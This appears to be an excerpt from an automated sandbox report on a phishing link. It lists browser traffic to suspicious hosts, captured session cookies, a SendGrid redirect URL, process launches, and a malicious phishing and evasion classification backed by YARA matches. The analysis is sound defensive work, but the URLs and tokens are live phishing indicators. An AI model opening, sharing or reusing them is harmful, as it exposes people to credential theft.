Source: global traffic HTTP traffic detected: GET /uvJtmTGXX2g3FEEqQIMgBrLoxZ456mS64jlG3A6l7y7Lxkm6YTIoOlgS7jv42MEgh260 HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://rft.naturdon.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rft.naturdon.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /bChJbJByRMoiWVIzJsvbypYtqUVUTWUTXNFKJKJACAZSJESGCWVJJAOEENGZXBFSRWIWRBRMCVRFSKpqYiU5PkU4ch34fiS6guv40 HTTP/1.1Host: d2fykjvf206smvkvkvv0u6jhkusv7w0lybl1wipgnt1qufyffe.sorenxw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: chromecache_104.2.dr String found in binary or memory: http://github.com/fent/randexp.js/raw/master/LICENSE
Source: chromecache_118.2.dr String found in binary or memory: https://RFT.naturdon.com/iVYo/#D
Source: chromecache_104.2.dr String found in binary or memory: https://github.com/fent)
Source: chromecache_87.2.dr String found in binary or memory: https://www.amazon.com
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Windows\SystemTemp\scoped_dir3940_1712182888
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File deleted: C:\Windows\SystemTemp\scoped_dir3940_1712182888
Source: classification engine Classification label: mal100.phis.evad.win@23/93@48/26
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2200,i,17724770803338348954,5673265326058284753,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2304 /prefetch:3
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://u17065553.ct.sendgrid.net/ls/click?upn=u001.Rw-2FXpvWBRDxNoiEvv-2B0VhMl349dE-2BIxYKCLpL5-2B-2FL8px39hmRTYxAZ-2BeMH1CR7jYvsg3f7mQR-2BtgzEdpv6rWDyoEa1Isq60WafIaat9IMqfozrbRuGiDhSD5zRfw1vSUnaPfHOkeKVWyjmgPghsIl-2FnSiz3vjd-2BgNdZNW1WWi7RlhTni8jQbV4O1UkQOa0-2F2VYGlXOPUclqMwRi50Vl1PR4j2jhVrjOnUdA6E03jJF3YxTMCgxElFH-2Bjnu2oS6ZdGJGXf9TKr37Eh3pnVym0G5ilxnSN6bJyz-2FWbi47cL6vQDH-2FLX6HDdsxLQr4OiWNyplfwZIjGldJH3Oj3k-2B0Sr92pyHOs07I3QG9CN9BFC52s0blv8XoiBzACqb7MDZTgdhgx-2Fj3fdHjRUqn0E0aUxawEH-2F-2B7SQiAWk4bi4jHEXI-3DlKA5_AMa9RrBWZfrIG11ZEW0ArF1BRI9e8rcrPZr5T9DlZ7Ba2ZAvuJPwiS8cX4aFrXjFerUDwGcfFdNk6Ly7G30W-2FpJZ3vwwQM6aCBocvejnros7-2FYckwVQH02a6C13hCOZXCH6DxRozn9HOBenC-2BdqPCIwBV1vvkSKYyJjB4wo2MVyi5b4Ko6F9xhTiwowhGgTSo1JEnvhUu4BAFpCuBdmsFw-3D-3D"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: Window Recorder Window detected: More than 3 window changes detected

Malware Analysis System Evasion

Source: Yara match File source: 2.4.d.script.csv, type: HTML
Source: Yara match File source: 3.13..script.csv, type: HTML
Source: Yara match File source: 3.14..script.csv, type: HTML
Source: Yara match File source: 3.5.pages.csv, type: HTML
Source: Yara match File source: 3.4.pages.csv, type: HTML
Source: Yara match File source: 3.6.pages.csv, type: HTML
Source: Yara match File source: 3.7.pages.csv, type: HTML